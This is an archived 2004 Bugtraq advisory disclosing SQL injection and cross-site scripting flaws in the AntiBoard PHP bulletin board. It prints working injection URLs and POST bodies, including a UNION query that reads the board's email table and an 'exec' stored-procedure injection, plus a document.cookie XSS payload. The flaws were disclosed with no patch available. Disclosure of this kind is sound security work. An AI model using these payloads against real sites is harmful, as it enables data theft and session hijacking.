lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20040728182450.10293.qmail@www.securityfocus.com>
Date: 28 Jul 2004 18:24:50 -0000
From: Josh Gilmour <gilmourj@...il.com>
To: bugtraq@...urityfocus.com
Subject: AntiBoard <= 0.7.2 XSS/SQL Injection




#######################################################################

Product:  AntiBoard
Written By:  djresonance - djresonance <at> yahoo <dot> com
Versions Affected :  <= 0.7.2
About:  AntiBoard is a small and compact multi-threaded bulletin board/message board...
Vulnerabilities:  XSS/SQL Injection
Date:  July 27, 2004
Author:  Josh Gilmour - joshg <at> conqwest <dot> com

#######################################################################

1. Introduction
2. XSS/SQL Injection Points
3. Fixes ?

#######################################################################

++++++++++++++
- Introduction
++++++++++++++

This widely used board is small and compact as stated before, great to
use for home users running a webserver and want some bulletin board
action.

From the site:
AntiBoard is a small and compact multi-threaded bulletin board/message
board system written in PHP. It uses either MySQL or PostgreSQL as the
database backend, and has support for different languages. It is not
meant as the end all be all of bulletin boards, but rather something
to easily integrate into your own page.

I found these while just playing around with the software, I tend to
start playing around with software on freshmeat when i get bored..
(yeah i know, get a life).

Freshmeat Stats:
» Rating:  8.10/10.00 (Rank N/A)
» Vitality: 0.01% (Rank 8248)
» Popularity: 1.12% (Rank 3894)

#######################################################################

++++++++++++++
- XSS/Injection Points
++++++++++++++

There are a number of SQL points within this piece of software. Some
are harmless, others can produce tables that you may not want to have
others see...

Lets begin...

SQL Injection Points:
UNION QUERY USING GET:
============
/antiboard.php?thread_id=1%20UNION%20ALL%20select%20field%20from%20whatever--&mode=threaded&sort_order=
============
/antiboard.php?range=all&mode=threaded&thread_id=1&reply=1&parent_id=1%20UNION%20ALL%20select%20field%20from%20whatever--
============
/antiboard.php?range=all&thread_id=1%20UNION%20ALL%20select%20field%20from%20whatever--&sort_order=ASC&mode=threaded
============
antiboard.php?thread_id=1&parent_id=1%20UNION%20ALL%20select%20field%20from%20whatever--&mode=nested&reply=1
============

STORED PROCEDURE POSSIBLE:
============
POST antiboard.php poster_name=1111&poster_email=1111&message_title=1111&message_body=1111&submit=Submit%2bmessage&thread_id=3&mode=1';%20exec%20whatever--&range=&parent_id=0&reply=reply
============

UNION QUERY USING POST:
============
POST antiboard.php poster_name=1111&poster_email=1111&message_title=1111&message_body=1111&submit=Submit%2bmessage&thread_id=3&mode=threaded&range=&parent_id=1%20UNION ALL select field from antiboard_emails----&reply=reply
============
(try this one out, you may not like the results)

And i only briefly went over XSS, I'm sure its vulnerable in more places..

XSS Injection Point:
http:///antiboard.php?thread_id=1&mode=threaded&range=&feedback=&lt;script&gt;alert(document.cookie);&lt;/script&gt;

######################################################################

++++++++++++++
- Fixes?
++++++++++++++

Vendor Notified: Yes (about 30 min ago)
Patch Released: No, not at the moment, and author doesnt plan to update.

dont have too much fun.


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ